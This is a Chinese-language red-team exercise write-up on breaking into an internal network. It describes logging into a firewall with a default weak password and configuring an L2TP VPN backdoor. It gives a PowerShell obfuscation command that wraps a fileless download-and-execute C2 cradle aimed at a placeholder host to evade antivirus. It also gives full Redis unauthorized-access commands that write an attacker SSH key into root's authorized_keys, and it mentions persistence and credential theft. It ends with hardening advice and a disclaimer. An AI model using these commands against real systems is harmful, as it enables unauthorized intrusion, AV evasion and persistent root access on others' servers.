一次攻防演练简单记录
字数 1532 2025-08-11 08:36:33

基于边界设备VPN搭建与Redis未授权漏洞的内网渗透技术详解

1. 信息收集与初始访问

1.1 信息收集方法论

在授权渗透测试或攻防演练中,信息收集是首要步骤,主要包括:

  • 端口扫描:使用Nmap、Masscan等工具识别开放端口和服务
  • WHOIS查询:获取域名注册信息
  • 子域名收集:通过工具如subfinder、amass等发现更多资产
  • 搜索引擎语法:使用Google dorking或Hunter等平台发现敏感信息

1.2 常见初始访问途径

  • Web应用漏洞(如SQL注入、文件上传等)
  • 弱口令攻击(尤其关注边界设备如防火墙、VPN等)
  • 暴露的敏感服务(如Redis、MongoDB等无认证服务)

2. 利用防火墙弱口令搭建VPN隧道

2.1 前提条件

  • 获取防火墙管理权限(示例中使用admin/123456)
  • 确认防火墙具有VPN功能(本例为L2TP VPN)

2.2 详细配置步骤

  1. 确定互联网接口

    • 在"网络-接口"中确认连接互联网的物理接口(示例为ethernet0/8)

  2. 配置L2TP VPN实例

    • 路径:"网络-VPN-L2TP VPN"
    • 配置名称自定义
    • AAA服务器选择"local"(本地认证)

  3. 接口/地址池/IPSec配置

    • 选择出接口为互联网接口
    • 配置隧道接口:
      • 名称和描述自定义
      • 安全域选择"VPNhub"
      • 分配一个内网未使用的静态IP作为VPN网关
    • 配置地址池:
      • 起止IP范围需与网关IP同网段
      • 名称自定义

  4. 高级选项配置

    • 将PPP认证设为"任意"(降低连接限制)

  5. 创建VPN用户

    • 路径:"对象-用户"
    • 新建VPN账户用于客户端连接

  6. 客户端连接

    • 下载或配置VPN客户端
    • 使用创建的用户凭证连接

3. 内网渗透与权限维持

3.1 内网探测

  • 使用工具如Tscan进行内网资产扫描
  • 重点关注:
    • 常见漏洞服务(如Shiro反序列化)
    • 出网机器(便于C2通信)

3.2 绕过杀软技术

PowerShell混淆技术

  1. 使用powershell-obfuscation.ps1脚本:

    .\powershell-obfuscation.ps1 -c "whoami"  # 混淆命令
.\powershell-obfuscation.ps1 -f "filename"  # 混淆文件

  2. 不落地执行C2 payload:

    .\powershell-obfuscation.ps1 -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/a'))"

  3. 复制输出内容直接执行,避免文件落地触发杀软

4. Redis未授权访问漏洞利用

4.1 漏洞原理

Redis默认配置无认证机制,攻击者可利用此漏洞:

  • 写入SSH公钥获取服务器权限
  • 写入Webshell
  • 进行数据窃取或篡改

4.2 SSH公钥写入详细步骤

  1. 本地生成SSH密钥对

    ssh-keygen -t rsa  # 密码留空
cd .ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt

  2. 将公钥写入Redis

    cat /root/.ssh/1.txt | redis-cli -h [目标IP] -x set pub

  3. 通过Redis-cli连接目标

    redis-cli -h [目标IP]

  4. 配置Redis持久化路径

    CONFIG GET dir  # 查看当前备份路径
CONFIG SET dir /root/.ssh/  # 修改为SSH目录
CONFIG SET dbfilename authorized_keys  # 设置备份文件名

  5. SSH免密登录

    ssh -i id_rsa root@[目标IP]

5. 内网横向移动

5.1 自动化扫描工具

  • 使用Tscan等工具进行内网扫描
  • 重点关注:
    • 通用漏洞(RCE、注入等)
    • 不同架构适配(Intel/Mac芯片)

5.2 横向技术要点

  1. 权限维持:在关键机器部署持久化后门
  2. 凭证收集:获取域凭证或本地账户密码
  3. 网络拓扑分析:识别关键服务器和数据库
  4. 时间管理:攻防演练中需平衡深度与广度

6. 安全建议

6.1 防御VPN滥用

  • 禁用默认账户和弱口令
  • 限制VPN访问权限
  • 启用多因素认证
  • 监控异常VPN连接

6.2 Redis安全加固

  • 启用认证(requirepass配置)
  • 绑定特定IP(bind配置)
  • 修改默认端口
  • 限制危险命令(rename-command配置)
  • 使用低权限账户运行Redis

6.3 内网安全建议

  • 实施网络分段
  • 部署终端检测与响应(EDR)
  • 定期漏洞扫描与修复
  • 最小权限原则
  • 日志集中收集与分析

7. 法律与道德声明

所有渗透测试活动必须:

  1. 获得明确书面授权
  2. 限定测试范围和时间
  3. 所有操作留痕可审计
  4. 测试后安全销毁所有数据
  5. 提供完整测试报告

本技术文档仅用于安全研究目的,严禁用于非法活动。

基于边界设备VPN搭建与Redis未授权漏洞的内网渗透技术详解 1. 信息收集与初始访问 1.1 信息收集方法论 在授权渗透测试或攻防演练中,信息收集是首要步骤,主要包括: 端口扫描 :使用Nmap、Masscan等工具识别开放端口和服务 WHOIS查询 :获取域名注册信息 子域名收集 :通过工具如subfinder、amass等发现更多资产 搜索引擎语法 :使用Google dorking或Hunter等平台发现敏感信息 1.2 常见初始访问途径 Web应用漏洞(如SQL注入、文件上传等) 弱口令攻击(尤其关注边界设备如防火墙、VPN等) 暴露的敏感服务(如Redis、MongoDB等无认证服务) 2. 利用防火墙弱口令搭建VPN隧道 2.1 前提条件 获取防火墙管理权限(示例中使用admin/123456) 确认防火墙具有VPN功能(本例为L2TP VPN) 2.2 详细配置步骤 确定互联网接口 在"网络-接口"中确认连接互联网的物理接口(示例为ethernet0/8) 配置L2TP VPN实例 路径:"网络-VPN-L2TP VPN" 配置名称自定义 AAA服务器选择"local"(本地认证) 接口/地址池/IPSec配置 选择出接口为互联网接口 配置隧道接口: 名称和描述自定义 安全域选择"VPNhub" 分配一个内网未使用的静态IP作为VPN网关 配置地址池: 起止IP范围需与网关IP同网段 名称自定义 高级选项配置 将PPP认证设为"任意"(降低连接限制) 创建VPN用户 路径:"对象-用户" 新建VPN账户用于客户端连接 客户端连接 下载或配置VPN客户端 使用创建的用户凭证连接 3. 内网渗透与权限维持 3.1 内网探测 使用工具如Tscan进行内网资产扫描 重点关注: 常见漏洞服务(如Shiro反序列化) 出网机器(便于C2通信) 3.2 绕过杀软技术 PowerShell混淆技术 : 使用powershell-obfuscation.ps1脚本: 不落地执行C2 payload: 复制输出内容直接执行,避免文件落地触发杀软 4. Redis未授权访问漏洞利用 4.1 漏洞原理 Redis默认配置无认证机制,攻击者可利用此漏洞: 写入SSH公钥获取服务器权限 写入Webshell 进行数据窃取或篡改 4.2 SSH公钥写入详细步骤 本地生成SSH密钥对 将公钥写入Redis 通过Redis-cli连接目标 配置Redis持久化路径 SSH免密登录 5. 内网横向移动 5.1 自动化扫描工具 使用Tscan等工具进行内网扫描 重点关注: 通用漏洞(RCE、注入等) 不同架构适配(Intel/Mac芯片) 5.2 横向技术要点 权限维持 :在关键机器部署持久化后门 凭证收集 :获取域凭证或本地账户密码 网络拓扑分析 :识别关键服务器和数据库 时间管理 :攻防演练中需平衡深度与广度 6. 安全建议 6.1 防御VPN滥用 禁用默认账户和弱口令 限制VPN访问权限 启用多因素认证 监控异常VPN连接 6.2 Redis安全加固 启用认证(requirepass配置) 绑定特定IP(bind配置) 修改默认端口 限制危险命令(rename-command配置) 使用低权限账户运行Redis 6.3 内网安全建议 实施网络分段 部署终端检测与响应(EDR) 定期漏洞扫描与修复 最小权限原则 日志集中收集与分析 7. 法律与道德声明 所有渗透测试活动必须: 获得明确书面授权 限定测试范围和时间 所有操作留痕可审计 测试后安全销毁所有数据 提供完整测试报告 本技术文档仅用于安全研究目的,严禁用于非法活动。